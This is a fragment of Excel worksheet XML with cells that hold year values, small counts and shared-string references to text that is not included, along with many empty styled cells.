      </c>
      <c r="F90" s="38" t="s">
        <v>263</v>
      </c>
      <c r="G90" s="38">
        <v>3.0</v>
      </c>
      <c r="H90" s="38" t="s">
        <v>267</v>
      </c>
      <c r="I90" s="38">
        <v>1.0</v>
      </c>
      <c r="J90" s="12"/>
      <c r="K90" s="12"/>
      <c r="L90" s="12"/>
      <c r="M90" s="12"/>
      <c r="N90" s="12"/>
      <c r="O90" s="12"/>
      <c r="P90" s="12"/>
      <c r="Q90" s="12"/>
      <c r="R90" s="12"/>
      <c r="S90" s="12"/>
      <c r="T90" s="12"/>
      <c r="U90" s="12"/>
      <c r="V90" s="12"/>
      <c r="W90" s="12"/>
      <c r="X90" s="12"/>
      <c r="Y90" s="12"/>
      <c r="Z90" s="12"/>
      <c r="AA90" s="12"/>
      <c r="AB90" s="12"/>
      <c r="AC90" s="12"/>
    </row>
    <row r="91">
      <c r="A91" s="10">
        <v>2015.0</v>
      </c>
      <c r="B91" s="38" t="s">
        <v>603</v>
      </c>
      <c r="C91" s="38">
        <v>17.0</v>
      </c>
      <c r="D91" s="38" t="s">
        <v>247</v>
      </c>
      <c r="E91" s="38">
        <v>3.0</v>
      </c>
      <c r="F91" s="38" t="s">
        <v>263</v>
      </c>
      <c r="G91" s="38">
        <v>1.0</v>
      </c>
      <c r="H91" s="38" t="s">
        <v>249</v>
      </c>
      <c r="I91" s="38">
        <v>2.0</v>
      </c>
      <c r="J91" s="38" t="s">
        <v>251</v>
      </c>
      <c r="K91" s="38">
        <v>3.0</v>
      </c>
      <c r="L91" s="38" t="s">
        <v>274</v>
      </c>
      <c r="M91" s="38">
        <v>3.0</v>
      </c>
      <c r="N91" s="38" t="s">
        <v>266</v>
      </c>
      <c r="O91" s="38">
        <v>3.0</v>
      </c>
      <c r="P91" s="38" t="s">
        <v>245</v>
      </c>
      <c r="Q91" s="38">
        <v>2.0</v>
      </c>
      <c r="R91" s="12"/>
      <c r="S91" s="12"/>
      <c r="T91" s="12"/>
      <c r="U91" s="12"/>
      <c r="V91" s="12"/>
      <c r="W91" s="12"/>
      <c r="X91" s="12"/>
      <c r="Y91" s="12"/>
      <c r="Z91" s="12"/>
      <c r="AA91" s="12"/>
      <c r="AB91" s="12"/>
      <c r="AC91" s="12"/>
    </row>
    <row r="92">
      <c r="A92" s="10">
        <v>2015.0</v>
      </c>
      <c r="B92" s="38" t="s">
        <v>607</v>
      </c>
      <c r="C92" s="38" t="s">
        <v>609</v>
      </c>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row>
    <row r="93">
      <c r="A93" s="10">
        <v>2015.0</v>
      </c>
      <c r="B93" s="38" t="s">
        <v>613</v>
      </c>
      <c r="C93" s="38">
        <v>16.0</v>
      </c>
      <c r="D93" s="38" t="s">
        <v>614</v>
      </c>
      <c r="E93" s="38">
        <v>6.0</v>
      </c>
      <c r="F93" s="38" t="s">
        <v>247</v>
      </c>
      <c r="G93" s="38">
        <v>4.0</v>
      </c>
      <c r="H93" s="38" t="s">
        <v>249</v>
      </c>
      <c r="I93" s="38">
        <v>2.0</v>
      </c>
      <c r="J93" s="38" t="s">
        <v>363</v>
      </c>
      <c r="K93" s="38">
        <v>4.0</v>
      </c>
      <c r="L93" s="12"/>
      <c r="M93" s="12"/>
      <c r="N93" s="12"/>
      <c r="O93" s="12"/>
      <c r="P93" s="12"/>
      <c r="Q93" s="12"/>
      <c r="R93" s="12"/>
      <c r="S93" s="12"/>
      <c r="T93" s="12"/>
      <c r="U93" s="12"/>
      <c r="V93" s="12"/>
      <c r="W93" s="12"/>
      <c r="X93" s="12"/>
      <c r="Y93" s="12"/>
      <c r="Z93" s="12"/>
      <c r="AA93" s="12"/>
      <c r="AB93" s="12"/>
      <c r="AC93" s="12"/>
    </row>
    <row r="94">
      <c r="A94" s="10">
        <v>2015.0</v>
      </c>
      <c r="B94" s="38" t="s">
        <v>615</v>
      </c>
      <c r="C94" s="38">
        <v>23.0</v>
      </c>
      <c r="D94" s="38" t="s">
        <v>247</v>
      </c>
      <c r="E94" s="38">
        <v>5.0</v>
      </c>
      <c r="F94" s="38" t="s">
        <v>249</v>
      </c>
      <c r="G94" s="38">
        <v>4.0</v>
      </c>
      <c r="H94" s="38" t="s">
        <v>255</v>
      </c>
      <c r="I94" s="38">
        <v>6.0</v>
      </c>
      <c r="J94" s="38" t="s">
        <v>251</v>
      </c>
      <c r="K94" s="38">
        <v>5.0</v>
      </c>
      <c r="L94" s="38" t="s">
        <v>245</v>
      </c>
      <c r="M94" s="38">
        <v>3.0</v>
      </c>
      <c r="N94" s="12"/>
      <c r="O94" s="12"/>
      <c r="P94" s="12"/>
      <c r="Q94" s="12"/>
      <c r="R94" s="12"/>
      <c r="S94" s="12"/>
      <c r="T94" s="12"/>
      <c r="U94" s="12"/>
      <c r="V94" s="12"/>
      <c r="W94" s="12"/>
      <c r="X94" s="12"/>
      <c r="Y94" s="12"/>
      <c r="Z94" s="12"/>
      <c r="AA94" s="12"/>
      <c r="AB94" s="12"/>
      <c r="AC94" s="12"/>
    </row>
    <row r="95">
      <c r="A95" s="10">
        <v>2015.0</v>
      </c>
      <c r="B95" s="38" t="s">
        <v>625</v>
      </c>
      <c r="C95" s="38">
        <v>20.0</v>
      </c>
      <c r="D95" s="38" t="s">
        <v>254</v>
      </c>
      <c r="E95" s="38">
        <v>1.0</v>
      </c>
      <c r="F95" s="38" t="s">
        <v>267</v>
      </c>
      <c r="G95" s="38">
        <v>2.0</v>
      </c>
      <c r="H95" s="38" t="s">
        <v>255</v>
      </c>
      <c r="I95" s="38">
        <v>2.0</v>
      </c>
      <c r="J95" s="38" t="s">
        <v>312</v>
      </c>
      <c r="K95" s="38">
        <v>2.0</v>
      </c>
      <c r="L95" s="38" t="s">
        <v>251</v>
      </c>
      <c r="M95" s="38">
        <v>4.0</v>
      </c>
      <c r="N95" s="38" t="s">
        <v>274</v>
      </c>
      <c r="O95" s="38">
        <v>1.0</v>
      </c>
      <c r="P95" s="38" t="s">
        <v>266</v>
      </c>
      <c r="Q95" s="38">
        <v>5.0</v>
      </c>
      <c r="R95" s="38" t="s">
        <v>245</v>
      </c>
      <c r="S95" s="38">
        <v>3.0</v>
      </c>
      <c r="T95" s="12"/>
      <c r="U95" s="12"/>
      <c r="V95" s="12"/>
      <c r="W95" s="12"/>
      <c r="X95" s="12"/>
      <c r="Y95" s="12"/>
      <c r="Z95" s="12"/>
      <c r="AA95" s="12"/>
      <c r="AB95" s="12"/>
      <c r="AC95" s="12"/>
    </row>
    <row r="96">
      <c r="A96" s="10">
        <v>2015.0</v>
      </c>
      <c r="B96" s="38" t="s">
        <v>629</v>
      </c>
      <c r="C96" s="38">
        <v>26.0</v>
      </c>
      <c r="D96" s="38" t="s">
        <v>501</v>
      </c>
      <c r="E96" s="38">
        <v>1.0</v>
      </c>
      <c r="F96" s="38" t="s">
        <v>247</v>
      </c>
      <c r="G96" s="38">
        <v>7.0</v>
      </c>
      <c r="H96" s="38" t="s">
        <v>494</v>
      </c>
      <c r="I96" s="38">
        <v>3.0</v>
      </c>
      <c r="J96" s="38" t="s">
        <v>447</v>
      </c>
      <c r="K96" s="38">
        <v>1.0</v>
      </c>
      <c r="L96" s="38" t="s">
        <v>255</v>
      </c>
      <c r="M96" s="38">
        <v>3.0</v>
      </c>
      <c r="N96" s="38" t="s">
        <v>312</v>
      </c>
      <c r="O96" s="38">
        <v>2.0</v>
      </c>
      <c r="P96" s="38" t="s">
        <v>251</v>
      </c>
      <c r="Q96" s="38">
        <v>1.0</v>
      </c>
      <c r="R96" s="38" t="s">
        <v>274</v>
      </c>
      <c r="S96" s="38">
        <v>5.0</v>
      </c>
      <c r="T96" s="38" t="s">
        <v>245</v>
      </c>
      <c r="U96" s="38">
        <v>4.0</v>
      </c>
      <c r="V96" s="12"/>
      <c r="W96" s="12"/>
      <c r="X96" s="12"/>
      <c r="Y96" s="12"/>
      <c r="Z96" s="12"/>
      <c r="AA96" s="12"/>
      <c r="AB96" s="12"/>
      <c r="AC96" s="12"/>
    </row>
    <row r="97">
      <c r="A97" s="10">
        <v>2015.0</v>
      </c>
      <c r="B97" s="38" t="s">
        <v>632</v>
      </c>
      <c r="C97" s="38">
        <v>9.0</v>
      </c>
      <c r="D97" s="38" t="s">
        <v>247</v>
      </c>
      <c r="E97" s="38">
        <v>3.0</v>
      </c>
      <c r="F97" s="38" t="s">
        <v>255</v>
      </c>
      <c r="G97" s="38">
        <v>3.0</v>
      </c>
      <c r="H97" s="38" t="s">
        <v>251</v>
      </c>
      <c r="I97" s="38">
        <v>3.0</v>
      </c>
      <c r="J97" s="38" t="s">
        <v>245</v>
      </c>
      <c r="K97" s="38">
        <v>4.0</v>
      </c>
      <c r="L97" s="12"/>
      <c r="M97" s="12"/>
      <c r="N97" s="12"/>
      <c r="O97" s="12"/>
      <c r="P97" s="12"/>
      <c r="Q97" s="12"/>
      <c r="R97" s="12"/>
      <c r="S97" s="12"/>
      <c r="T97" s="12"/>
      <c r="U97" s="12"/>
      <c r="V97" s="12"/>
      <c r="W97" s="12"/>
      <c r="X97" s="12"/>
      <c r="Y97" s="12"/>
      <c r="Z97" s="12"/>
      <c r="AA97" s="12"/>
      <c r="AB97" s="12"/>
      <c r="AC97" s="12"/>
    </row>
    <row r="98">
      <c r="A98" s="10">
        <v>2015.0</v>
      </c>
      <c r="B98" s="38" t="s">
        <v>633</v>
      </c>
      <c r="C98" s="38">
        <v>25.0</v>
      </c>
      <c r="D98" s="38" t="s">
        <v>247</v>
      </c>
      <c r="E98" s="38">
        <v>4.0</v>
      </c>
      <c r="F98" s="38" t="s">
        <v>263</v>
      </c>
      <c r="G98" s="38">
        <v>4.0</v>
      </c>
      <c r="H98" s="38" t="s">
        <v>255</v>
      </c>
      <c r="I98" s="38">
        <v>4.0</v>
      </c>
      <c r="J98" s="38" t="s">
        <v>251</v>
      </c>
      <c r="K98" s="38">
        <v>6.0</v>
      </c>
      <c r="L98" s="38" t="s">
        <v>245</v>
      </c>
      <c r="M98" s="38">
        <v>7.0</v>
      </c>
      <c r="N98" s="12"/>
      <c r="O98" s="12"/>
      <c r="P98" s="12"/>
      <c r="Q98" s="12"/>
      <c r="R98" s="12"/>
      <c r="S98" s="12"/>
      <c r="T98" s="12"/>
      <c r="U98" s="12"/>
      <c r="V98" s="12"/>
      <c r="W98" s="12"/>
      <c r="X98" s="12"/>
      <c r="Y98" s="12"/>
      <c r="Z98" s="12"/>
      <c r="AA98" s="12"/>
      <c r="AB98" s="12"/>
      <c r="AC98" s="12"/>
    </row>
    <row r="99">
      <c r="A99" s="12"/>
      <c r="B99" s="12"/>
      <c r="C99" s="1"/>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5.57"/>
    <col customWidth="1" min="2" max="2" width="6.14"/>
    <col customWidth="1" min="3" max="3" width="11.86"/>
    <col customWidth="1" min="4" max="4" width="9.0"/>
    <col customWidth="1" min="5" max="5" width="11.14"/>
    <col customWidth="1" min="6" max="6" width="17.71"/>
    <col customWidth="1" min="7" max="7" width="44.43"/>
    <col customWidth="1" min="8" max="8" width="38.71"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="2" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="2" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="2" t="s">
        <v>2</v>
      </c>
      <c r="D1" s="2" t="s">
        <v>3</v>
      </c>
      <c r="E1" s="2" t="s">
        <v>4</v>
      </c>
      <c r="F1" s="2" t="s">
        <v>5</v>
      </c>
      <c r="G1" s="2" t="s">
        <v>6</v>
      </c>
      <c r="H1" s="2" t="s">
        <v>7</v>
      </c>
      <c r="I1" s="3"/>
      <c r="J1" s="5" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="2">
      <c r="A2" s="6" t="s">
        <v>9</v>
      </c>
      <c r="B2" s="7"/>
      <c r="C2" s="6"/>
      <c r="D2" s="6"/>
      <c r="E2" s="6"/>
      <c r="F2" s="6"/>
      <c r="G2" s="6"/>
      <c r="H2" s="6"/>
      <c r="I2" s="8"/>
      <c r="J2" s="8"/>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row>
    <row r="3">
      <c r="A3" s="2" t="s">
        <v>16</v>
      </c>
      <c r="B3" s="11">
        <v>2016.0</v>
      </c>
      <c r="C3" s="2" t="s">
        <v>90</v>
      </c>
      <c r="D3" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E3" s="2" t="s">
        <v>91</v>
      </c>
      <c r="F3" s="2" t="s">
        <v>93</v>
      </c>
      <c r="G3" s="16" t="s">
        <v>95</v>
      </c>
      <c r="H3" s="3"/>
      <c r="I3" s="3"/>
      <c r="J3" s="3"/>
    </row>
    <row r="4">
      <c r="A4" s="2" t="s">
        <v>16</v>
      </c>
      <c r="B4" s="11">
        <v>2016.0</v>
      </c>
      <c r="C4" s="2" t="s">
        <v>114</v>
      </c>
      <c r="D4" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E4" s="2" t="s">
        <v>116</v>
      </c>
      <c r="F4" s="2" t="s">
        <v>118</v>
      </c>
      <c r="G4" s="16" t="s">
        <v>119</v>
      </c>
      <c r="H4" s="3"/>
      <c r="I4" s="3"/>
      <c r="J4" s="3"/>
    </row>
    <row r="5">
      <c r="A5" s="2" t="s">
        <v>16</v>
      </c>
      <c r="B5" s="11">
        <v>2016.0</v>
      </c>
      <c r="C5" s="2" t="s">
        <v>121</v>
      </c>
      <c r="D5" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E5" s="2" t="s">
        <v>116</v>
      </c>
      <c r="F5" s="2" t="s">
        <v>43</v>
      </c>
      <c r="G5" s="16" t="s">
        <v>123</v>
      </c>
      <c r="H5" s="3"/>
      <c r="I5" s="3"/>
      <c r="J5" s="3"/>
    </row>
    <row r="6">
      <c r="A6" s="2" t="s">
        <v>16</v>
      </c>
      <c r="B6" s="11">
        <v>2016.0</v>
      </c>
      <c r="C6" s="2" t="s">
        <v>126</v>
      </c>
      <c r="D6" s="2" t="s">
        <v>128</v>
      </c>
      <c r="E6" s="2" t="s">
        <v>116</v>
      </c>
      <c r="F6" s="2" t="s">
        <v>129</v>
      </c>
      <c r="G6" s="16" t="s">
        <v>130</v>
      </c>
      <c r="H6" s="2" t="s">
        <v>131</v>
      </c>
      <c r="I6" s="3"/>
      <c r="J6" s="3"/>
    </row>
    <row r="7">
      <c r="A7" s="2" t="s">
        <v>61</v>
      </c>
      <c r="B7" s="11">
        <v>2014.0</v>
      </c>
      <c r="C7" s="2" t="s">
        <v>134</v>
      </c>
      <c r="D7" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E7" s="2" t="s">
        <v>116</v>
      </c>
      <c r="F7" s="2" t="s">
        <v>136</v>
      </c>
      <c r="G7" s="16" t="s">
        <v>138</v>
      </c>
      <c r="H7" s="3"/>
      <c r="I7" s="3"/>
      <c r="J7" s="3"/>
    </row>
    <row r="8">
      <c r="A8" s="2" t="s">
        <v>61</v>
      </c>
      <c r="B8" s="11">
        <v>2014.0</v>
      </c>
      <c r="C8" s="2" t="s">
        <v>144</v>
      </c>
      <c r="D8" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E8" s="2" t="s">
        <v>116</v>
      </c>
      <c r="F8" s="2" t="s">
        <v>146</v>
      </c>
      <c r="G8" s="16" t="s">
        <v>147</v>
      </c>
      <c r="H8" s="3"/>
      <c r="I8" s="3"/>
      <c r="J8" s="3"/>
    </row>
    <row r="9">
      <c r="A9" s="2" t="s">
        <v>61</v>
      </c>
      <c r="B9" s="11">
        <v>2014.0</v>
      </c>
      <c r="C9" s="2" t="s">
        <v>152</v>
      </c>
      <c r="D9" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E9" s="2" t="s">
        <v>116</v>
      </c>
      <c r="F9" s="2" t="s">
        <v>119</v>
      </c>
      <c r="G9" s="2" t="s">
        <v>119</v>
      </c>
      <c r="H9" s="3"/>
      <c r="I9" s="3"/>
      <c r="J9" s="3"/>
    </row>
    <row r="10">
      <c r="A10" s="2" t="s">
        <v>61</v>
      </c>
      <c r="B10" s="11">
        <v>2014.0</v>
      </c>
      <c r="C10" s="2" t="s">
        <v>166</v>
      </c>
      <c r="D10" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E10" s="2" t="s">
        <v>116</v>
      </c>
      <c r="F10" s="2" t="s">
        <v>130</v>
      </c>
      <c r="G10" s="2" t="s">
        <v>130</v>
      </c>
      <c r="H10" s="3"/>
      <c r="I10" s="3"/>
      <c r="J10" s="3"/>
    </row>
    <row r="11">
      <c r="A11" s="2" t="s">
        <v>61</v>
      </c>
      <c r="B11" s="11">
        <v>2014.0</v>
      </c>
      <c r="C11" s="2" t="s">
        <v>174</v>
      </c>
      <c r="D11" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E11" s="2" t="s">
        <v>116</v>
      </c>
      <c r="F11" s="2" t="s">
        <v>130</v>
      </c>
      <c r="G11" s="2" t="s">
        <v>130</v>
      </c>
      <c r="H11" s="3"/>
      <c r="I11" s="3"/>
      <c r="J11" s="3"/>
    </row>
    <row r="12">
      <c r="A12" s="2" t="s">
        <v>61</v>
      </c>
      <c r="B12" s="11">
        <v>2014.0</v>
      </c>
      <c r="C12" s="2" t="s">
        <v>182</v>
      </c>
      <c r="D12" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E12" s="2" t="s">
        <v>116</v>
      </c>
      <c r="F12" s="2" t="s">
        <v>184</v>
      </c>
      <c r="G12" s="2" t="s">
        <v>186</v>
      </c>
      <c r="H12" s="3"/>
      <c r="I12" s="3"/>
      <c r="J12" s="3"/>
    </row>
    <row r="13">
      <c r="A13" s="2" t="s">
        <v>61</v>
      </c>
      <c r="B13" s="11">
        <v>2014.0</v>
      </c>
      <c r="C13" s="2" t="s">
        <v>195</v>
      </c>
      <c r="D13" s="2" t="s">
        <v>48</v>
      </c>
      <c r="E13" s="2" t="s">
        <v>116</v>
      </c>
      <c r="F13" s="2" t="s">
        <v>184</v>
      </c>
      <c r="G13" s="2" t="s">
        <v>147</v>
      </c>
      <c r="H13" s="21" t="s">
        <v>196</v>
      </c>
      <c r="I13" s="3"/>
      <c r="J13" s="3"/>
    </row>
    <row r="14">
      <c r="A14" s="2" t="s">
        <v>61</v>
      </c>
      <c r="B14" s="11">
        <v>2014.0</v>
      </c>
      <c r="C14" s="2" t="s">
        <v>221</v>
      </c>
      <c r="D14" s="2" t="s">
        <v>48</v>
      </c>
      <c r="E14" s="2" t="s">
        <v>116</v>
      </c>
      <c r="F14" s="2" t="s">
        <v>184</v>
      </c>
      <c r="G14" s="2" t="s">
        <v>222</v>
      </c>
      <c r="H14" s="3"/>
      <c r="I14" s="3"/>
      <c r="J14" s="3"/>
    </row>
    <row r="15">
      <c r="A15" s="2" t="s">
        <v>61</v>
      </c>
      <c r="B15" s="11">
        <v>2014.0</v>
      </c>
      <c r="C15" s="2" t="s">
        <v>228</v>
      </c>
      <c r="D15" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E15" s="2" t="s">
        <v>116</v>
      </c>
      <c r="F15" s="2" t="s">
        <v>123</v>
      </c>
      <c r="G15" s="2" t="s">
        <v>123</v>
      </c>
      <c r="H15" s="3"/>
      <c r="I15" s="3"/>
      <c r="J15" s="3"/>
    </row>
    <row r="16">
      <c r="A16" s="2" t="s">
        <v>61</v>
      </c>
      <c r="B16" s="11">
        <v>2014.0</v>
      </c>
      <c r="C16" s="2" t="s">
        <v>237</v>
      </c>
      <c r="D16" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E16" s="2" t="s">
        <v>116</v>
      </c>
      <c r="F16" s="2" t="s">
        <v>123</v>
      </c>
      <c r="G16" s="16" t="s">
        <v>238</v>
      </c>
      <c r="H16" s="3"/>
      <c r="I16" s="3"/>
      <c r="J16" s="3"/>
    </row>
    <row r="17">
      <c r="A17" s="2" t="s">
        <v>61</v>
      </c>
      <c r="B17" s="11">
        <v>2014.0</v>
      </c>
      <c r="C17" s="2" t="s">
        <v>240</v>
      </c>
      <c r="D17" s="2" t="s">
        <v>48</v>
      </c>
      <c r="E17" s="2" t="s">
        <v>116</v>
      </c>
      <c r="F17" s="2" t="s">
        <v>123</v>
      </c>
      <c r="G17" s="2" t="s">
        <v>123</v>
      </c>
      <c r="H17" s="3"/>
      <c r="I17" s="3"/>
      <c r="J17" s="3"/>
    </row>
    <row r="18">
      <c r="A18" s="2" t="s">
        <v>61</v>
      </c>
      <c r="B18" s="11">
        <v>2014.0</v>
      </c>
      <c r="C18" s="2" t="s">
        <v>242</v>
      </c>
      <c r="D18" s="2" t="s">
        <v>48</v>
      </c>
      <c r="E18" s="2" t="s">
        <v>116</v>
      </c>
      <c r="F18" s="2" t="s">
        <v>123</v>
      </c>
      <c r="G18" s="2" t="s">
        <v>123</v>
      </c>
      <c r="H18" s="3"/>
      <c r="I18" s="3"/>
      <c r="J18" s="3"/>
    </row>
    <row r="19">
      <c r="A19" s="2" t="s">
        <v>61</v>
      </c>
      <c r="B19" s="11">
        <v>2014.0</v>
      </c>
      <c r="C19" s="2" t="s">
        <v>243</v>
      </c>
      <c r="D19" s="2" t="s">
        <v>48</v>
      </c>
      <c r="E19" s="2" t="s">
        <v>116</v>
      </c>
      <c r="F19" s="3"/>
      <c r="G19" s="16" t="s">
        <v>244</v>
      </c>
      <c r="H19" s="3"/>
      <c r="I19" s="3"/>
      <c r="J19" s="3"/>
    </row>
    <row r="20">
      <c r="A20" s="17">
        <v>42503.0</v>
      </c>
      <c r="B20" s="7"/>
      <c r="C20" s="6"/>
      <c r="D20" s="6"/>
      <c r="E20" s="6"/>
      <c r="F20" s="6"/>
      <c r="G20" s="6"/>
      <c r="H20" s="6"/>
      <c r="I20" s="8"/>
      <c r="J20" s="8"/>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c r="IR20" s="9"/>
      <c r="IS20" s="9"/>
      <c r="IT20" s="9"/>
      <c r="IU20" s="9"/>
      <c r="IV20" s="9"/>
      <c r="IW20" s="9"/>
      <c r="IX20" s="9"/>
      <c r="IY20" s="9"/>
      <c r="IZ20" s="9"/>
      <c r="JA20" s="9"/>
      <c r="JB20" s="9"/>
      <c r="JC20" s="9"/>
      <c r="JD20" s="9"/>
      <c r="JE20" s="9"/>
      <c r="JF20" s="9"/>
      <c r="JG20" s="9"/>
      <c r="JH20" s="9"/>
      <c r="JI20" s="9"/>
      <c r="JJ20" s="9"/>
      <c r="JK20" s="9"/>
      <c r="JL20" s="9"/>
      <c r="JM20" s="9"/>
      <c r="JN20" s="9"/>
      <c r="JO20" s="9"/>
      <c r="JP20" s="9"/>
      <c r="JQ20" s="9"/>
      <c r="JR20" s="9"/>
      <c r="JS20" s="9"/>
      <c r="JT20" s="9"/>
      <c r="JU20" s="9"/>
      <c r="JV20" s="9"/>
      <c r="JW20" s="9"/>
      <c r="JX20" s="9"/>
      <c r="JY20" s="9"/>
      <c r="JZ20" s="9"/>
      <c r="KA20" s="9"/>
      <c r="KB20" s="9"/>
      <c r="KC20" s="9"/>
      <c r="KD20" s="9"/>
      <c r="KE20" s="9"/>
      <c r="KF20" s="9"/>
      <c r="KG20" s="9"/>
      <c r="KH20" s="9"/>
      <c r="KI20" s="9"/>
      <c r="KJ20" s="9"/>
      <c r="KK20" s="9"/>
      <c r="KL20" s="9"/>
      <c r="KM20" s="9"/>
      <c r="KN20" s="9"/>
      <c r="KO20" s="9"/>
      <c r="KP20" s="9"/>
      <c r="KQ20" s="9"/>
      <c r="KR20" s="9"/>
      <c r="KS20" s="9"/>
      <c r="KT20" s="9"/>
      <c r="KU20" s="9"/>
      <c r="KV20" s="9"/>
      <c r="KW20" s="9"/>
      <c r="KX20" s="9"/>
      <c r="KY20" s="9"/>
      <c r="KZ20" s="9"/>
      <c r="LA20" s="9"/>
      <c r="LB20" s="9"/>
      <c r="LC20" s="9"/>
      <c r="LD20" s="9"/>
      <c r="LE20" s="9"/>
      <c r="LF20" s="9"/>
      <c r="LG20" s="9"/>
      <c r="LH20" s="9"/>
      <c r="LI20" s="9"/>
      <c r="LJ20" s="9"/>
      <c r="LK20" s="9"/>
      <c r="LL20" s="9"/>
      <c r="LM20" s="9"/>
      <c r="LN20" s="9"/>
      <c r="LO20" s="9"/>
      <c r="LP20" s="9"/>
      <c r="LQ20" s="9"/>
      <c r="LR20" s="9"/>
      <c r="LS20" s="9"/>
      <c r="LT20" s="9"/>
      <c r="LU20" s="9"/>
      <c r="LV20" s="9"/>
      <c r="LW20" s="9"/>
      <c r="LX20" s="9"/>
      <c r="LY20" s="9"/>
      <c r="LZ20" s="9"/>
      <c r="MA20" s="9"/>
      <c r="MB20" s="9"/>
      <c r="MC20" s="9"/>
      <c r="MD20" s="9"/>
      <c r="ME20" s="9"/>
      <c r="MF20" s="9"/>
      <c r="MG20" s="9"/>
      <c r="MH20" s="9"/>
      <c r="MI20" s="9"/>
      <c r="MJ20" s="9"/>
      <c r="MK20" s="9"/>
      <c r="ML20" s="9"/>
      <c r="MM20" s="9"/>
      <c r="MN20" s="9"/>
      <c r="MO20" s="9"/>
      <c r="MP20" s="9"/>
      <c r="MQ20" s="9"/>
      <c r="MR20" s="9"/>
      <c r="MS20" s="9"/>
      <c r="MT20" s="9"/>
      <c r="MU20" s="9"/>
      <c r="MV20" s="9"/>
      <c r="MW20" s="9"/>
      <c r="MX20" s="9"/>
      <c r="MY20" s="9"/>
      <c r="MZ20" s="9"/>
      <c r="NA20" s="9"/>
      <c r="NB20" s="9"/>
      <c r="NC20" s="9"/>
      <c r="ND20" s="9"/>
      <c r="NE20" s="9"/>
      <c r="NF20" s="9"/>
      <c r="NG20" s="9"/>
      <c r="NH20" s="9"/>
      <c r="NI20" s="9"/>
      <c r="NJ20" s="9"/>
      <c r="NK20" s="9"/>
      <c r="NL20" s="9"/>
      <c r="NM20" s="9"/>
      <c r="NN20" s="9"/>
      <c r="NO20" s="9"/>
      <c r="NP20" s="9"/>
      <c r="NQ20" s="9"/>
      <c r="NR20" s="9"/>
      <c r="NS20" s="9"/>
      <c r="NT20" s="9"/>
      <c r="NU20" s="9"/>
      <c r="NV20" s="9"/>
      <c r="NW20" s="9"/>
      <c r="NX20" s="9"/>
      <c r="NY20" s="9"/>
      <c r="NZ20" s="9"/>
      <c r="OA20" s="9"/>
      <c r="OB20" s="9"/>
      <c r="OC20" s="9"/>
      <c r="OD20" s="9"/>
      <c r="OE20" s="9"/>
      <c r="OF20" s="9"/>
      <c r="OG20" s="9"/>
      <c r="OH20" s="9"/>
      <c r="OI20" s="9"/>
      <c r="OJ20" s="9"/>
      <c r="OK20" s="9"/>
      <c r="OL20" s="9"/>
      <c r="OM20" s="9"/>
      <c r="ON20" s="9"/>
      <c r="OO20" s="9"/>
      <c r="OP20" s="9"/>
      <c r="OQ20" s="9"/>
      <c r="OR20" s="9"/>
      <c r="OS20" s="9"/>
      <c r="OT20" s="9"/>
      <c r="OU20" s="9"/>
      <c r="OV20" s="9"/>
      <c r="OW20" s="9"/>
      <c r="OX20" s="9"/>
      <c r="OY20" s="9"/>
      <c r="OZ20" s="9"/>
      <c r="PA20" s="9"/>
      <c r="PB20" s="9"/>
      <c r="PC20" s="9"/>
      <c r="PD20" s="9"/>
      <c r="PE20" s="9"/>
      <c r="PF20" s="9"/>
      <c r="PG20" s="9"/>
      <c r="PH20" s="9"/>
      <c r="PI20" s="9"/>
      <c r="PJ20" s="9"/>
      <c r="PK20" s="9"/>
      <c r="PL20" s="9"/>
      <c r="PM20" s="9"/>
      <c r="PN20" s="9"/>
      <c r="PO20" s="9"/>
      <c r="PP20" s="9"/>
      <c r="PQ20" s="9"/>
      <c r="PR20" s="9"/>
      <c r="PS20" s="9"/>
      <c r="PT20" s="9"/>
      <c r="PU20" s="9"/>
      <c r="PV20" s="9"/>
      <c r="PW20" s="9"/>
      <c r="PX20" s="9"/>
      <c r="PY20" s="9"/>
      <c r="PZ20" s="9"/>
      <c r="QA20" s="9"/>
      <c r="QB20" s="9"/>
      <c r="QC20" s="9"/>
      <c r="QD20" s="9"/>
      <c r="QE20" s="9"/>
      <c r="QF20" s="9"/>
      <c r="QG20" s="9"/>
      <c r="QH20" s="9"/>
      <c r="QI20" s="9"/>
      <c r="QJ20" s="9"/>
      <c r="QK20" s="9"/>
      <c r="QL20" s="9"/>
      <c r="QM20" s="9"/>
      <c r="QN20" s="9"/>
      <c r="QO20" s="9"/>
      <c r="QP20" s="9"/>
      <c r="QQ20" s="9"/>
      <c r="QR20" s="9"/>
      <c r="QS20" s="9"/>
      <c r="QT20" s="9"/>
      <c r="QU20" s="9"/>
      <c r="QV20" s="9"/>
      <c r="QW20" s="9"/>
      <c r="QX20" s="9"/>
      <c r="QY20" s="9"/>
      <c r="QZ20" s="9"/>
      <c r="RA20" s="9"/>
      <c r="RB20" s="9"/>
      <c r="RC20" s="9"/>
      <c r="RD20" s="9"/>
      <c r="RE20" s="9"/>
      <c r="RF20" s="9"/>
      <c r="RG20" s="9"/>
      <c r="RH20" s="9"/>
      <c r="RI20" s="9"/>
      <c r="RJ20" s="9"/>
      <c r="RK20" s="9"/>
      <c r="RL20" s="9"/>
      <c r="RM20" s="9"/>
      <c r="RN20" s="9"/>
      <c r="RO20" s="9"/>
      <c r="RP20" s="9"/>
      <c r="RQ20" s="9"/>
      <c r="RR20" s="9"/>
      <c r="RS20" s="9"/>
      <c r="RT20" s="9"/>
      <c r="RU20" s="9"/>
      <c r="RV20" s="9"/>
      <c r="RW20" s="9"/>
      <c r="RX20" s="9"/>
      <c r="RY20" s="9"/>
      <c r="RZ20" s="9"/>
      <c r="SA20" s="9"/>
      <c r="SB20" s="9"/>
      <c r="SC20" s="9"/>
      <c r="SD20" s="9"/>
      <c r="SE20" s="9"/>
      <c r="SF20" s="9"/>
      <c r="SG20" s="9"/>
      <c r="SH20" s="9"/>
      <c r="SI20" s="9"/>
      <c r="SJ20" s="9"/>
      <c r="SK20" s="9"/>
      <c r="SL20" s="9"/>
